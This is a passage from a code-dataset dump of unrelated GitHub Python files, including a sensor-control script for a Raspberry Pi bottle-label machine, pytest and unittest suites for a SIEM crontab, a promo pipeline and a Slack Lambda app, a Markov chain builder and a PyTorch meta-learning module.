cronjob.next_schedule.replace(microsecond=0) < now\n\n cronjob = CronJob(cron_id,\n cron_name,\n cron_schedule,\n cronjob_test_func,\n cron_base,\n cron_runcnt,\n user=env.request.user)\n\n # replace() needed for croniter < 0.3.8\n assert now < cronjob.next_schedule.replace(microsecond=0) < now + timedelta(minutes=1)\n\n # run()\n query = env.db.query(\"SELECT id, runcnt FROM Prewikka_Crontab WHERE id=%d\", cron_id)\n\n assert len(query) == 1\n\n runcnt = int(query[0][1])\n cronjob.run(now + timedelta(minutes=1))\n gevent.sleep(1)\n query = env.db.query(\"SELECT id, runcnt FROM Prewikka_Crontab WHERE id=%d\", cron_id)\n\n 
assert len(query) == 1\n assert int(query[0][1]) == runcnt+1\n\n cronjob.run(now + timedelta(minutes=1))\n gevent.sleep(1)\n query = env.db.query(\"SELECT id, runcnt FROM Prewikka_Crontab WHERE id=%d\", cron_id)\n\n assert len(query) == 1\n assert int(query[0][1]) == runcnt+1\n\n with pytest.raises(Exception):\n CronJob(cron_id,\n cron_name,\n cron_schedule,\n cronjob_test_func_exception(),\n cron_base,\n cron_runcnt,\n user=env.request.user)\n\n # clean\n env.db.query('DELETE FROM Prewikka_Crontab')\n","repo_name":"Prelude-SIEM/prewikka","sub_path":"tests/tests_crontab/test_crontab.py","file_name":"test_crontab.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"}
{"seq_id":"21525508426","text":"import vlc\nimport time\nimport smbus\nimport GUI2\nimport serial #serial communication\n\n#initialize the serial link\nuart2 = serial.Serial(port = \"/dev/ttyAMA1\", baudrate = 115200)\nuart2.flushInput()\n\nbus = smbus.SMBus(1) ## open the I2C bus\naddress = 0x48 ## address ---> device address (hardware address, fixed by the chip)\nA0 = 0x40 ## A0 ----> address of one input channel (the data register)\nA1 = 0x41\nA2 = 0x42\nA3 = 0x43\n\n\ncheck = 0\n#photoresistor: 0 = no bottle detected 1: bottle with label 2: bottle without label\n#infrared beam sensor: 3: something passed through\n\n#0 means the program is stopped, 1 means it is running\nsta = 0\nNum = 0\n\n\ndef readOnce():\n while True:\n count = uart2.inWaiting()\n if count != 0:\n recv = uart2.read(count) \n print(\"Recv some data is : \")\n print(recv)\n uart2.flushInput()\n break\n\ndef loop1():#photoresistor polling loop\n global check\n global sta\n global Num\n part = 0#which range the current reading falls in\n Time = 0#consecutive-sample count\n T=7#target count\n starttime = time.time()\n while True:\n bus.write_byte(address,A0) ## tell the Pi which channel of which device to sample\n value0 =bus.read_byte(address) ## read the value\n print(value0)\n print(sta)\n\n time.sleep(0.5)\n if(value0 <= 100 and sta == 1):#no bottle\n# print(\"in\")\n check = 0\n Time=0\n part=0\n if(time.time()-starttime >= 40):\n break\n elif(value0 <= 100 and sta == 0):\n# print(\"in\")\n if(part == 0):\n Time = Time + 1\n else:\n Time=1\n part=0\n if(Time == T-2):\n check = 0\n Time=0\n part=0\n print(check)\n break\n \n elif(value0 > 125):#bottle with label\n if(part == 1):\n Time = Time + 1\n else:\n Time=1\n part=1\n if(Time == T):\n check = 1\n Time=0\n part=0\n print(check)\n break\n\n elif(value0>100 and value0 <= 125):#bottle without label\n if(part == 2):\n Time = Time + 1\n else:\n Time=1\n part=2\n if(Time == T):\n check = 2\n Time=0\n part=0\n# print(\"bottle without label\")\n break\n# print(value1)\n#0:no bottle detected(<=90)\n#1:bottle with label(=>160)\n#2:bottle without label(100= 10):#nothing detected for a while\n check = 4\n break\n \n bus.write_byte(address,A1)\n print(bus.read_byte(address))\n if(X == bus.read_byte(address)):#same value as the first X, so increment the counter\n time1 = time1 + 1\n elif(X != bus.read_byte(address)):#if the new reading differs from X, restart the count\n time1 = 0\n X = bus.read_byte(address)\n###########\n bus.write_byte(address,A2)\n if(Y == bus.read_byte(address)):\n time2 = time2 + 1\n elif(Y != bus.read_byte(address)):\n time2 = 0\n Y = bus.read_byte(address)\n############\n bus.write_byte(address,A3)\n if(Z == bus.read_byte(address)):\n time3 = time3 + 1\n elif(Z != bus.read_byte(address)):\n time3 = 0\n Z = bus.read_byte(address)\n############ \n if(time1 == Time|time2 == Time|time3 == Time):#break once the same value has been seen ten times\n time1 = 0\n time2 = 0\n time3 = 0\n check=3\n break\n print(\"red out\")\n \n#has the bottle dropped? leaving this loop means it has\ndef loop3():\n Time = 0\n T = 5\n while True:\n time.sleep(1)\n bus.write_byte(address,A0)\n value = bus.read_byte(address)\n print(value)\n if(value <= 105):#no bottle\n Time= Time + 1\n else:\n Time = 0\n if(Time == 5):\n break\n\ndef loop():\n global check\n global sta\n global Num\n Num = 0\n ####\n 
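# assumption: \"#W1000\" and the \"#F...\" codes below are this project's own UART command strings understood by the controller\n 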
uart2.write(\"#W1000\".encode(\"utf-8\"))#点击开始,发送信息\n readOnce()\n time.sleep(1.5)\n while True:\n uart2.write(\"#F1001\".encode(\"utf-8\"))#开始接收瓶子\n readOnce()\n #光敏电阻阶段\n loop1()\n #check=0一定时间无瓶子递入 check=1瓶子有标签 check=2瓶子无标签\n \n if(check == 0 & Num == 0):#回到UI开始界面,全部参数初始化,发送一个信息\n uart2.write(\"#F0000\".encode(\"utf-8\"))\n readOnce()\n destroy()\n GUI2.a = 0\n break\n ######!\n elif(check == 0 & Num != 0):#结束界面,重置所有参数,发送一个信息\n uart2.write(\"#F0000\".encode(\"utf-8\"))\n readOnce()\n destroy()\n GUI2.a = 0\n break\n #####!\n elif(check == 1):#有瓶子有标签, 切割步骤,发送信息\n uart2.write(\"#F1002\".encode(\"utf-8\"))\n readOnce()\n Num= Num + 1\n #########\n #红外线阶段\n time.sleep(4)\n while True:\n loop6()\n if(check == 3):#有东西经过,把瓶子送走\n uart2.write(\"#F1004\".encode(\"utf-8\"))\n readOnce()\n break\n elif(check == 4):\n break\n# elif(check == 4):#没东西经过\n# loop1()\n# if (check == 2):#标签已脱落,但没有掉落——发送消息,瓶子送走\n# uart2.write(\"#F1004\".encode(\"utf-8\"))\n# readOnce()\n# check = 0\n# break\n# elif(check == 1):#回到红外检测循环\n \n elif(check == 2):#有瓶子无标签, 瓶子送走\n uart2.write(\"#F1004\".encode(\"utf-8\"))\n readOnce()\n Num= Num+1\n print(check)\n if(check == 4):\n GUI2.a=0\n destroy()\n break\n #瓶子是否掉落,如果循环跳出,说明瓶子掉落\n loop3()\n print(Num)\n uart2.write(\"#F0000\".encode(\"utf-8\"))\n readOnce()\n if(sta == 0 ):\n uart2.write(\"#E9999\".encode(\"utf-8\"))\n readOnce()\n destroy()\n break\n\ndef loop4():\n while True:\n bus.write_byte(address,A3)\n Z =bus.read_byte(address)\n print(Z)\n\ndef loop5():\n global check\n Time = 0\n T = 5\n starttime = time.time()\n while True:\n if(time.time()-starttime >= 20):#一段时间检测不到东西\n check = 4\n #break\n bus.write_byte(address,A1)\n value = bus.read_byte(address)\n print(value)\n if(value>=70):\n Time = Time + 1\n if(Time >= T ):\n check = 3\n #break\n print(\"red out\")\n \ndef loop6():\n global check\n Time = 0\n T = 10\n bus.write_byte(address,A0)\n while True:\n time.sleep(0.5)\n value = bus.read_byte(address)\n print(value)\n if(value>100 and value <= 125):\n Time= Time+1\n if(Time>=T):\n check = 3\n break\n print(\"red out\")\n if(GUI2.a == 0):\n check = 4\n break\n \n \ndef destroy():\n global check\n global sta\n global Num\n \n check = 0\n Num = 0\n sta=0","repo_name":"2forFive/LabelOFF-Raspi","sub_path":"PhotoresistorAndInfrared.py","file_name":"PhotoresistorAndInfrared.py","file_ext":"py","file_size_in_byte":8200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73213682793","text":"def title_case(title, minor_words=''):\n if title == '':\n return title\n else:\n title = title.lower().split(' ')\n minor_words = minor_words.lower().split(' ')\n for word in range(len(title)):\n if title[word] not in minor_words or word == 0:\n title[word] = title[word][0].upper() + title[word][1:]\n\n return ' '.join(title)\n\n\nprint(title_case('', ''))\n","repo_name":"DaveAigbe/Challenges","sub_path":"CodeWars/CW- Title Case.py","file_name":"CW- Title Case.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8387725879","text":"#! 
Version 3\r\nimport os\r\nimport pickle\r\nfrom markov_chain import Markov_Chain\r\nfrom markov_tree import Markov_Tree\r\nimport time\r\n\r\n\r\nclass Markov_Builder:\r\n\r\n def __init__(self, interface, path, n, max_keys=100000):\r\n self.path = path\r\n self.n = n\r\n self.max_keys = max_keys\r\n self.tree = Markov_Tree(\r\n f'{path}-mc/{self}', n, max_keys)\r\n with open(f'{path}-mc/bck/latest.txt') as f:\r\n self.part_count = int(f.readline().strip('\\n'))\r\n\r\n def run(self):\r\n paths = self._get_bck_files()\r\n self.tree.reset_dir()\r\n print(f'[STA] Merging {len(paths)} parts')\r\n self.current_bck = 0\r\n self.total_bck = len(paths)\r\n start = time.time()\r\n for i in range(self.total_bck):\r\n self.current_bck = i\r\n with open(paths[i], 'rb') as f:\r\n status = self.tree.insert(pickle.load(f))\r\n if i > 0:\r\n left = (time.time() - start) / i\r\n else:\r\n left = -1\r\n print(\r\n f'[STA] Files: {status[0]} / Total Keys: {status[1]} / Last File: {status[2]} / Secs Left: {left} ', end='\\r')\r\n\r\n print(\r\n f'[STA] Merge completed after {time.time() - start} seconds. Files can be found at {self.tree.path}.')\r\n return Markov_Chain(self.tree.path, self.n)\r\n\r\n def __str__(self):\r\n return f'mc3-n{self.n}-K{self.max_keys}'\r\n\r\n def _get_bck_files(self):\r\n files = []\r\n for i in range(1, self.part_count+1):\r\n files.append(self._bck_file(i))\r\n return files\r\n\r\n def _bck_file(self, x):\r\n return f'{self.path}-mc/bck/{x}.{self.n}.pkl'\r\n","repo_name":"mifrandir/seminararbeit-demo","sub_path":"program/mc3/markov_builder.py","file_name":"markov_builder.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"444169239","text":"# coding: utf-8\n\nimport pytest\nfrom hamcrest import assert_that\n\nfrom market.idx.datacamp.controllers.piper.yatf.resources.config_mock import PiperConfigMock\nfrom market.idx.datacamp.controllers.piper.yatf.test_env_old import PiperTestEnv\nfrom market.idx.datacamp.proto.api.DatacampMessage_pb2 import DatacampMessage\nfrom market.idx.datacamp.proto.promo.Promo_pb2 import PromoDescription, PromoType, PromoPromotion\nfrom market.idx.pylibrary.datacamp.utils import wait_until\nfrom market.idx.yatf.matchers.protobuf_matchers import IsSerializedProtobuf\nfrom market.idx.yatf.matchers.yt_rows_matchers import HasDatacampPromoRows\nfrom market.idx.yatf.resources.datacamp.datacamp_tables import (\n DataCampPromoTable,\n)\nfrom market.idx.yatf.resources.lbk_topic import LbkTopic\nfrom market.idx.yatf.utils.utils import create_timestamp_from_json\nfrom market.proto.common.promo_pb2 import ESourceType\nfrom market.pylibrary.proto_utils import message_from_data\n\n\nMETA_0 = {'timestamp': '2020-12-01T19:27:36Z'}\nMETA_1 = {'timestamp': '2020-12-02T19:27:36Z'}\n\nPROMOS = [\n {\n 'primary_key': {\n 'promo_id': '0'\n }\n },\n {\n 'primary_key': {\n 'promo_id': '0',\n 'business_id': 1\n }\n },\n {\n 'primary_key': {\n 'promo_id': '0',\n 'business_id': 2,\n 'source': ESourceType.PARTNER_SOURCE\n }\n },\n {\n 'primary_key': {\n 'promo_id': '1',\n 'business_id': 2,\n 'source': ESourceType.PARTNER_SOURCE\n },\n 'promo_general_info': {\n 'meta': META_0,\n 'promo_type': PromoType.PRICE_DROP,\n },\n 'constraints': {\n 'meta': META_0,\n 'enabled': True,\n 'start_date': 1606775557\n },\n 'responsible': {\n 'meta': META_0,\n 'author': 'Medved'\n },\n 'promotion': {\n 'meta': META_0,\n 'channel': [\n PromoPromotion.Channel.CATEGORY_ORDINARY_BANNER,\n 
PromoPromotion.Channel.PRODUCT_OF_DAY\n ]\n },\n 'mechanics_data': {\n 'meta': META_0,\n 'market_bonus': {\n 'description': 'Some description'\n }\n },\n 'additional_info': {\n 'meta': META_0,\n 'name': 'Super discount',\n }\n },\n]\n\n\ndef patch_metas(promos):\n fields_with_meta = ('promo_general_info', 'constraints', 'responsible', 'promotion', 'mechanics_data', 'additional_info')\n\n # Hackery because of the timestamps\n o = list(promos)\n for promo in o:\n for f in fields_with_meta:\n if f in promo and 'meta' in promo[f]:\n ts = create_timestamp_from_json(promo[f]['meta']['timestamp'])\n promo[f]['meta'] = {'timestamp': {'seconds': ts.seconds}}\n return o\n\n\n@pytest.fixture(scope='module')\ndef output_promos():\n return patch_metas(PROMOS)\n\n\n@pytest.fixture(scope='module')\ndef promos_table(yt_server, config):\n return DataCampPromoTable(\n yt_server,\n config.yt_promo_tablepath,\n )\n\n\n@pytest.fixture(scope='module')\ndef promos_datacamp_messages():\n return [message_from_data({'promos': {'promo': PROMOS}}, DatacampMessage())]\n\n\n@pytest.fixture(scope='module')\ndef promos_topic(log_broker_stuff):\n topic = LbkTopic(log_broker_stuff)\n return topic\n\n\n@pytest.fixture(scope='module')\ndef config(yt_server, log_broker_stuff, promos_topic):\n cfg = {\n 'logbroker': {\n 'promos_topic': promos_topic.topic\n },\n 'general': {\n 'color': 'white',\n }\n }\n\n return PiperConfigMock(yt_server=yt_server,\n log_broker_stuff=log_broker_stuff,\n config=cfg)\n\n\n@pytest.yield_fixture(scope='module')\ndef piper(yt_server, log_broker_stuff, config, promos_topic):\n resources = {\n 'config': config,\n 'promos_topic': promos_topic,\n }\n with PiperTestEnv(yt_server, log_broker_stuff, **resources) as piper_env:\n piper_env.verify()\n yield piper_env\n\n\n@pytest.fixture(scope='module')\ndef main_promos_inserter(promos_datacamp_messages, piper, promos_topic):\n for message in promos_datacamp_messages:\n promos_topic.write(message.SerializeToString())\n\n wait_until(lambda: piper.promo_processed >= len(PROMOS), timeout=60)\n\n\n# Check that promos are written correctly from the topic to the table\ndef test_write_new_promos(main_promos_inserter, piper, output_promos):\n assert_that(\n piper.promos_table.data,\n HasDatacampPromoRows(\n [\n {\n 'business_id': promo['primary_key']['business_id'] if 'business_id' in promo['primary_key'] else 0,\n 'source': promo['primary_key']['source'] if 'source' in promo['primary_key'] else 0,\n 'promo_id': promo['primary_key']['promo_id'],\n 'promo': IsSerializedProtobuf(PromoDescription, promo),\n }\n for promo in output_promos\n ]\n ),\n 'Missing promos'\n )\n\n\n# Check that promos are updated correctly from the topic\ndef test_update_promos(main_promos_inserter, piper, promos_topic, promos_datacamp_messages, output_promos, promos_table):\n # Run this test only after the messages from main_promos_inserter have been processed\n promo = {\n 'primary_key': {\n 'promo_id': 'SomePromo',\n 'business_id': 3,\n 'source': ESourceType.PARTNER_SOURCE\n },\n 'promo_general_info': {\n 'meta': META_0,\n 'promo_type': PromoType.PRICE_DROP,\n },\n 'constraints': {\n 'meta': META_0,\n 'enabled': True,\n 'start_date': 1606775557\n },\n 'responsible': {\n 'meta': META_0,\n 'author': 'Cat'\n },\n 'promotion': {\n 'meta': META_0,\n 'channel': [PromoPromotion.Channel.CATEGORY_ORDINARY_BANNER, PromoPromotion.Channel.PRODUCT_OF_DAY]\n },\n 'mechanics_data': {\n 'meta': META_0,\n 'market_bonus': {\n 'description': 'Some description'\n }\n },\n 'additional_info': {\n 'meta': META_0,\n 'name': 'Super discount',\n }\n }\n # Wrote the original data to the topic\n message = message_from_data({'promos': {'promo': [promo]}}, DatacampMessage())\n promos_topic.write(message.SerializeToString())\n wait_until(lambda: piper.promo_processed >= len(PROMOS) + 1, timeout=60)\n\n # Update every field + add something extra\n promo_update = {\n 'primary_key': {\n 'promo_id': 'SomePromo',\n 'business_id': 3,\n 'source': ESourceType.PARTNER_SOURCE\n },\n 'promo_general_info': {\n 'meta': META_1,\n 'promo_type': PromoType.BLUE_CASHBACK,\n },\n 'constraints': {\n 'meta': META_1,\n 'enabled': False,\n 'start_date': 1606775559,\n 'offers_matching_rules': [\n {\n 'category_restriction': {\n 'promo_category': [{\n 'id': 10\n }]\n }\n }\n ]\n },\n 'responsible': {\n 'meta': META_1,\n 'author': 'Dog'\n },\n 'promotion': {\n 'meta': META_1,\n 'channel': [PromoPromotion.Channel.PRODUCT_OF_DAY]\n },\n 'mechanics_data': {\n 'meta': META_1,\n 'market_bonus': {\n 'description': 'Some description222'\n }\n },\n 'additional_info': {\n 'meta': META_1,\n 'name': 'Super discount333',\n }\n }\n\n # Write the update\n message = message_from_data({'promos': {'promo': [promo_update]}}, DatacampMessage())\n promos_topic.write(message.SerializeToString())\n # Wait until 2 more of our messages have been processed (the promo + its update)\n wait_until(lambda: piper.promo_processed >= len(PROMOS) + 2, timeout=60)\n\n updated_promo = dict(promo)\n updated_promo.update(promo_update)\n\n expected_promos = list(output_promos)\n # In this test we pushed one promo and one update to it.\n expected_promos.extend(patch_metas([updated_promo]))\n\n for p in expected_promos:\n assert_that(\n piper.promos_table.data,\n HasDatacampPromoRows(\n [\n {\n 'business_id': p['primary_key']['business_id'] if 'business_id' in p['primary_key'] else 0,\n 'source': p['primary_key']['source'] if 'source' in p['primary_key'] else 0,\n 'promo_id': p['primary_key']['promo_id'],\n 'promo': IsSerializedProtobuf(PromoDescription, p),\n }\n ]\n ),\n 'Missing promos'\n )\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/tests/test_promos.py","file_name":"test_promos.py","file_ext":"py","file_size_in_byte":9362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"26490984424","text":"\"\"\"\nUnit tests for handling Slack Chat in ImmediateResponse.py\n\"\"\"\nimport json\nimport os\nimport unittest\nfrom unittest.mock import patch\n\nos.environ[\"SlackAppId\"] = \"APIID123456\"\nos.environ[\"SlackChannelIds\"] = \"C1111111111,C2222222222\"\nos.environ[\"SlackTeamIds\"] = \"T1111111111,T2222222222\"\nos.environ[\"SlackVerificationTokenParameterKey\"] = \"/apps/slack_app/dummy/token\"\nos.environ[\"AsyncWorkerLambdaFunctionName\"] = \"Dummy-AsyncWorker\"\nos.environ[\"SyncWorkerLambdaFunctionName\"] = \"Dummy-SyncWorker\"\nos.environ[\"OAuthDynamoDBTable\"] = \"DummyDDB\"\n\nfunc = __import__(\"ImmediateResponse\")\n\n\ndef mock_event(custom_data={}, channel=\"C1111111111\"):\n data = {\n \"token\": \"dummy-token\",\n \"team_id\": \"T1111111111\",\n \"api_app_id\": \"APIID123456\",\n \"event\": {\n \"client_msg_id\": \"b03d5869-53c0-4287-a711-0e7d34a8c001\",\n \"type\": \"app_mention\",\n \"text\": \"<@UB111111111>\",\n \"user\": \"U2222222222\",\n \"ts\": \"1634873264.005100\",\n \"team\": \"T1111111111\",\n \"blocks\": [\n {\n \"type\": \"rich_text\",\n \"block_id\": \"Cj64\",\n \"elements\": [\n {\n \"type\": \"rich_text_section\",\n \"elements\": [\n {\"type\": \"user\", 
\"user_id\": \"UB111111111\"},\n {\"type\": \"text\", \"text\": \" what\\nline 2\\nline 3\"},\n ],\n }\n ],\n }\n ],\n \"channel\": channel,\n \"event_ts\": \"1634873264.005100\",\n },\n \"type\": \"event_callback\",\n \"event_id\": \"Ev02JGDEJTCN\",\n \"event_time\": 1634873264,\n \"authed_users\": [\"UB111111111\"],\n \"authorizations\": [\n {\n \"enterprise_id\": \"null\",\n \"team_id\": \"T1111111111\",\n \"user_id\": \"UB111111111\",\n \"is_bot\": \"true\",\n \"is_enterprise_install\": \"false\",\n }\n ],\n \"is_ext_shared_channel\": \"false\",\n \"event_context\": \"xxx\",\n }\n data.update(custom_data)\n\n return {\"body\": json.dumps(data)}\n\n\ndef payload_in_bytes():\n payload_json = {\n \"app_id\": \"APIID123456\",\n \"channel_id\": \"C1111111111\",\n \"team_id\": \"T1111111111\",\n \"text\": \" what\\nline 2\\nline 3\",\n \"ts\": \"1634873264.005100\",\n \"user_id\": \"U2222222222\",\n }\n payload_str = json.dumps(payload_json)\n return bytes(payload_str, encoding=\"utf8\")\n\n\nMOCK_LAMBDA_INVOKE_RESPONSE = {\n \"ResponseMetadata\": {\n \"HTTPStatusCode\": 200,\n }\n}\n\n\nclass TestFunction(unittest.TestCase):\n def test_lambda_handler_all_good(self):\n with patch(\n \"ImmediateResponse.ssm_client.get_parameter\",\n return_value={\"Parameter\": {\"Value\": \"dummy-token\"}},\n ), patch(\"ImmediateResponse.oauth_table.get_item\") as mock_ddb_get_item, patch(\n \"ImmediateResponse.lambda_client.invoke\"\n ) as mock_lambda_invoke:\n mock_ddb_get_item.return_value = {\"Item\": {\"access_token\": \"dummy-bot-token\"}}\n mock_lambda_invoke.return_value = MOCK_LAMBDA_INVOKE_RESPONSE\n\n ret = func.lambda_handler(mock_event(), None)\n\n mock_ddb_get_item.assert_called_once_with(\n Key={\"app_id\": \"APIID123456\", \"team_id\": \"T1111111111\"}\n )\n\n mock_lambda_invoke.assert_called_once_with(\n FunctionName=\"Dummy-AsyncWorker\",\n InvocationType=\"Event\",\n Payload=payload_in_bytes(),\n )\n\n self.assertDictEqual(ret, {\"statusCode\": 200})\n\n def test_lambda_handler_failed_invalid_token(self):\n with patch(\n \"ImmediateResponse.ssm_client.get_parameter\",\n return_value={\"Parameter\": {\"Value\": \"dummy-token\"}},\n ), patch(\"ImmediateResponse.oauth_table.get_item\") as mock_ddb_get_item, patch(\n \"ImmediateResponse.call_slack_chat_post\"\n ) as mock_chat_post:\n mock_ddb_get_item.return_value = {\"Item\": {\"access_token\": \"dummy-bot-token\"}}\n\n ret = func.lambda_handler(mock_event({\"token\": \"invalid-token\"}), None)\n\n mock_ddb_get_item.assert_called_once_with(\n Key={\"app_id\": \"APIID123456\", \"team_id\": \"T1111111111\"}\n )\n\n mock_chat_post.assert_called_once_with(\n \"C1111111111\",\n \"1634873264.005100\",\n \"dummy-bot-token\",\n \"Sorry <@U2222222222>, an authentication error occurred. 
Please contact your admin.\",\n )\n\n self.assertDictEqual(ret, {\"statusCode\": 200})\n\n def test_lambda_handler_failed_no_bot_token(self):\n with patch(\n \"ImmediateResponse.ssm_client.get_parameter\",\n return_value={\"Parameter\": {\"Value\": \"dummy-token\"}},\n ), patch(\"ImmediateResponse.oauth_table.get_item\") as mock_ddb_get_item, patch(\n \"ImmediateResponse.call_slack_chat_post\"\n ) as mock_chat_post:\n # No item found for that team_id\n mock_ddb_get_item.return_value = {\"Item\": None}\n\n ret = func.lambda_handler(mock_event(), None)\n\n mock_ddb_get_item.assert_called_once_with(\n Key={\"app_id\": \"APIID123456\", \"team_id\": \"T1111111111\"}\n )\n\n mock_chat_post.assert_not_called()\n\n self.assertDictEqual(ret, {\"statusCode\": 200})\n\n def test_lambda_handler_failed_invalid_app_id(self):\n with patch(\n \"ImmediateResponse.ssm_client.get_parameter\",\n return_value={\"Parameter\": {\"Value\": \"dummy-token\"}},\n ), patch(\"ImmediateResponse.oauth_table.get_item\") as mock_ddb_get_item, patch(\n \"ImmediateResponse.call_slack_chat_post\"\n ) as mock_chat_post:\n mock_ddb_get_item.return_value = {\"Item\": {\"access_token\": \"dummy-bot-token\"}}\n\n ret = func.lambda_handler(mock_event({\"api_app_id\": \"invalid-app-id\"}), None)\n\n mock_ddb_get_item.assert_called_once_with(\n Key={\"app_id\": \"invalid-app-id\", \"team_id\": \"T1111111111\"}\n )\n\n mock_chat_post.assert_called_once_with(\n \"C1111111111\",\n \"1634873264.005100\",\n \"dummy-bot-token\",\n \"Sorry <@U2222222222>, this app does not support this app ID invalid-app-id.\",\n )\n\n self.assertDictEqual(ret, {\"statusCode\": 200})\n\n def test_lambda_handler_failed_invalid_team_id(self):\n with patch(\n \"ImmediateResponse.ssm_client.get_parameter\",\n return_value={\"Parameter\": {\"Value\": \"dummy-token\"}},\n ), patch(\"ImmediateResponse.oauth_table.get_item\") as mock_ddb_get_item, patch(\n \"ImmediateResponse.call_slack_chat_post\"\n ) as mock_chat_post:\n mock_ddb_get_item.return_value = {\"Item\": {\"access_token\": \"dummy-bot-token\"}}\n\n ret = func.lambda_handler(mock_event({\"team_id\": \"invalid-team-id\"}), None)\n\n mock_ddb_get_item.assert_called_once_with(\n Key={\"app_id\": \"APIID123456\", \"team_id\": \"invalid-team-id\"}\n )\n\n mock_chat_post.assert_called_once_with(\n \"C1111111111\",\n \"1634873264.005100\",\n \"dummy-bot-token\",\n \"Sorry <@U2222222222>, this app does not support this team ID invalid-team-id.\",\n )\n\n self.assertDictEqual(ret, {\"statusCode\": 200})\n\n def test_lambda_handler_failed_invalid_channel_id(self):\n with patch(\n \"ImmediateResponse.ssm_client.get_parameter\",\n return_value={\"Parameter\": {\"Value\": \"dummy-token\"}},\n ), patch(\"ImmediateResponse.oauth_table.get_item\") as mock_ddb_get_item, patch(\n \"ImmediateResponse.call_slack_chat_post\"\n ) as mock_chat_post:\n mock_ddb_get_item.return_value = {\"Item\": {\"access_token\": \"dummy-bot-token\"}}\n\n ret = func.lambda_handler(mock_event(channel=\"invalid-channel-id\"), None)\n\n mock_ddb_get_item.assert_called_once_with(\n Key={\"app_id\": \"APIID123456\", \"team_id\": \"T1111111111\"}\n )\n\n mock_chat_post.assert_called_once_with(\n \"invalid-channel-id\",\n \"1634873264.005100\",\n \"dummy-bot-token\",\n \"Sorry <@U2222222222>, this app does not support this channel ID invalid-channel-id.\",\n )\n\n self.assertDictEqual(ret, {\"statusCode\": 200})\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","repo_name":"kyhau/slack-chat-app-cdk","sub_path":"lambda/ImmediateResponse.test.py","file_name":"ImmediateResponse.test.py","file_ext":"py","file_size_in_byte":8673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"26742176624","text":"# -*- encoding: utf-8 -*-\r\n#Time :2021/03/15 16:53:33\r\n#Author :Chen\r\n#FileName :meta_base.py\r\n#Version :1.0\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\nimport torchvision\r\nfrom torch.autograd import Variable\r\nimport itertools\r\n\r\n\r\ndef to_var(x, requires_grad=True):\r\n if torch.cuda.is_available():\r\n x = x.cuda()\r\n return Variable(x, requires_grad=requires_grad)\r\n\r\n\r\nclass MetaModule(nn.Module):\r\n # adopted from: Adrien Ecoffet https://github.com/AdrienLE\r\n def params(self):\r\n for name, param in self.named_params(self):\r\n yield param\r\n\r\n def named_leaves(self):\r\n return []\r\n\r\n def named_submodules(self):\r\n return []\r\n\r\n def named_params(self, curr_module=None, memo=None, prefix=''):\r\n if memo is None:\r\n memo = set()\r\n\r\n if hasattr(curr_module, 'named_leaves'):\r\n for name, p in curr_module.named_leaves():\r\n if p is not None and p not in memo:\r\n memo.add(p)\r\n yield prefix + ('.' if prefix else '') + name, p\r\n else:\r\n for name, p in curr_module._parameters.items():\r\n if p is not None and p not in memo:\r\n memo.add(p)\r\n yield prefix + ('.' if prefix else '') + name, p\r\n\r\n for mname, module in curr_module.named_children():\r\n submodule_prefix = prefix + ('.' if prefix else '') + mname\r\n for name, p in self.named_params(module, memo, submodule_prefix):\r\n yield name, p\r\n\r\n def update_params(self, lr_inner, first_order=False, source_params=None, detach=False):\r\n if source_params is not None:\r\n for tgt, src in zip(self.named_params(self), source_params):\r\n name_t, param_t = tgt\r\n # name_s, param_s = src\r\n # grad = param_s.grad\r\n # name_s, param_s = src\r\n grad = src\r\n if first_order:\r\n grad = to_var(grad.detach().data)\r\n tmp = param_t - lr_inner * grad\r\n self.set_param(self, name_t, tmp)\r\n else:\r\n\r\n for name, param in self.named_params(self):\r\n if not detach:\r\n grad = param.grad\r\n if first_order:\r\n grad = to_var(grad.detach().data)\r\n tmp = param - lr_inner * grad\r\n self.set_param(self, name, tmp)\r\n else:\r\n param = param.detach_()\r\n self.set_param(self, name, param)\r\n\r\n def set_param(self, curr_mod, name, param):\r\n if '.' 
in name:\r\n n = name.split('.')\r\n module_name = n[0]\r\n rest = '.'.join(n[1:])\r\n for name, mod in curr_mod.named_children():\r\n if module_name == name:\r\n self.set_param(mod, rest, param)\r\n break\r\n else:\r\n setattr(curr_mod, name, param)\r\n\r\n def detach_params(self):\r\n for name, param in self.named_params(self):\r\n self.set_param(self, name, param.detach())\r\n\r\n def copy(self, other, same_var=False):\r\n for name, param in other.named_params():\r\n if not same_var:\r\n param = to_var(param.data.clone(), requires_grad=True)\r\n self.set_param(name, param)\r\n\r\n\r\nclass MetaLinear(MetaModule):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__()\r\n ignore = nn.Linear(*args, **kwargs)\r\n\r\n self.register_buffer('weight', to_var(ignore.weight.data, requires_grad=True))\r\n self.register_buffer('bias', to_var(ignore.bias.data, requires_grad=True))\r\n\r\n def forward(self, x):\r\n return F.linear(x, self.weight, self.bias)\r\n\r\n def named_leaves(self):\r\n return [('weight', self.weight), ('bias', self.bias)]\r\n\r\n\r\nclass MetaConv2d(MetaModule):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__()\r\n ignore = nn.Conv2d(*args, **kwargs)\r\n\r\n self.stride = ignore.stride\r\n self.padding = ignore.padding\r\n self.dilation = ignore.dilation\r\n self.groups = ignore.groups\r\n self.kernel_size = ignore.kernel_size\r\n self.out_channels = ignore.out_channels\r\n\r\n self.register_buffer('weight', to_var(ignore.weight.data, requires_grad=True))\r\n\r\n if ignore.bias is not None:\r\n self.register_buffer('bias', to_var(ignore.bias.data, requires_grad=True))\r\n else:\r\n self.register_buffer('bias', None)\r\n\r\n def forward(self, x):\r\n return F.conv2d(x, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\r\n\r\n def named_leaves(self):\r\n return [('weight', self.weight), ('bias', self.bias)]\r\n\r\n\r\nclass 